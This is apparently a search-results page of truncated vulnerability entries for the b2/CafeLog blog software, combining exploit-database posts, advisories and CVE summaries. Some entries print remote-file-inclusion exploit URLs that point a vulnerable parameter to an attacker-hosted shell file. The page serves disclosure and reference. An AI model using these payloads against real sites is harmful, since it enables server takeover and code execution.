128 matches found
b2 Blog 0.5 - 'b2verifauth.php' Remote File Inclusion
b2 - 0.5 index Remote File Ýnclude +class : Remote File Include Vulnerability + +Author : mdx +Files : +b2verifauth.php? +code : + + include$index; + + Exploit : ++ + http://www.site./path/b2verifauth.php?index=http://mdxshell.txt? +...
TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ========================================================================= TagIt! Tagboard --------------- Vulnerable: http://site/path/index.php?page=shell 0day.today 2018-03-12...
CafeLog B2 0.6.1 Weblog and News Publishing Tool - b2categories.php?b2inc Remote File Inclusion
CafeLog B2 0.6.1 Weblog and News Publishing Tool - b2categories.php?b2inc Remote File Inclusion source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues m...
CafeLog B2 0.6.1 Weblog and News Publishing Tool - b2mail.php?b2inc Remote File Inclusion
CafeLog B2 0.6.1 Weblog and News Publishing Tool - b2mail.php?b2inc Remote File Inclusion source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may all...
CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2mail.php?b2inc' Remote File Inclusion
source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are...
CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2categories.php?b2inc' Remote File Inclusion
source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are...
CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2archives.php?b2inc' Remote File Inclusion
source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are...
CafeLog B2 0.6.1 Weblog and News Publishing Tool - b2archives.php?b2inc Remote File Inclusion
CafeLog B2 0.6.1 Weblog and News Publishing Tool - b2archives.php?b2inc Remote File Inclusion source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may...
b2 cafelog: remote command execution, sql injection and another flaw.
Products: b2 cafelog 0.6.1 with ljupdate b2 cafelog 0.6.2 and prior Author: FraMe frame at kernelpanik.org URL: http://www.kernelpanik.org CONTENTS 1. Overview 2. Description. 3. Details. 4. Vendor Response 1. Overview. b2 is a news/weblog tool written in php. b2 uses MySQL as backend system. 2...
b2cafelog.txt
Products: b2 cafelog 0.6.1 http://cafelog.com/ Date: 29 May 2003 Author: pokleyzz Contributors: skatscan-associates.net shaharilatscan-associates.net muniratscan-associates.net URL: http://www.scan-associates.net Summary: b2 cafelog 0.6.1 remote command execution. Description =========== b2 cafel...
b2 cafelog 0.6.1 remote command execution.
Products: b2 cafelog 0.6.1 http://cafelog.com/ Date: 29 May 2003 Author: pokleyzz pokleyzzatscan-associates.net Contributors: skatscan-associates.net shaharilatscan-associates.net muniratscan-associates.net URL: http://www.scan-associates.net Summary: b2 cafelog 0.6.1 remote command execution...
Cafelog b2 0.6 - Remote File Inclusion
Cafelog b2 0.6 - Remote File Inclusion source: https://www.securityfocus.com/bid/7738/info A remote file include vulnerability has been reported for Cafelog. Due to insufficient sanitization of some user-supplied variables by the 'blogger-2-b2.php' and 'gm-2-b2.php' scripts, it is possible for a...
CafeLog B2 Multiple Script Remote File Inclusion
The remote web server is running CafeLog, a blogging application written in PHP. The 'blogger-2-b2.php' and 'gm-2-b2.php' scripts are affected by a flaw that could allow an attacker to inject code. An attacker could exploit this to execute arbitrary code on the remote host subject to the privileg...
CVE-2002-1464
Cross-site scripting XSS vulnerability in CafeLog b2 Weblog Tool allows remote attackers to insert arbitrary HTML or script via the GPC variable...
CVE-2002-1466
CafeLog b2 Weblog Tool 2.06pre4, with allowfopenurl enabled, allows remote attackers to execute arbitrary PHP code via the b2inc variable...
CVE-2002-1465
SQL injection vulnerability in CafeLog b2 Weblog Tool allows remote attackers to execute arbitrary SQL code via the tablehosts variable...
CVE-2002-0734
b2edit.showposts.php in B2 2.0.6pre2 and earlier does not properly load the b2config.php file in some configurations, which allows remote attackers to execute arbitrary PHP code via a URL that sets the $b2inc variable to point to a malicious program stored on a remote server...
CVE-2002-0734
B2 2.0.6pre2 and earlier are affected by CVE-2002-0734 due to a flaw in how b2edit.showposts.php loads b2config.php in certain configurations. This can allow a remote attacker to execute arbitrary PHP code by crafting a URL that sets the $b2inc variable to point to a malicious program hosted remo...
CVE-2002-1466
The CVE-2002-1466 entry affects CafeLog b2 Weblog Tool 2.06pre4 when allow_fopen_url is enabled. The vulnerability allows remote attackers to execute arbitrary PHP code via the b2inc variable, enabling full compromise of affected installations. The root cause is the ability to reference or includ...
CVE-2002-1464
Cross-site scripting XSS vulnerability in CafeLog b2 Weblog Tool allows remote attackers to insert arbitrary HTML or script via the GPC variable...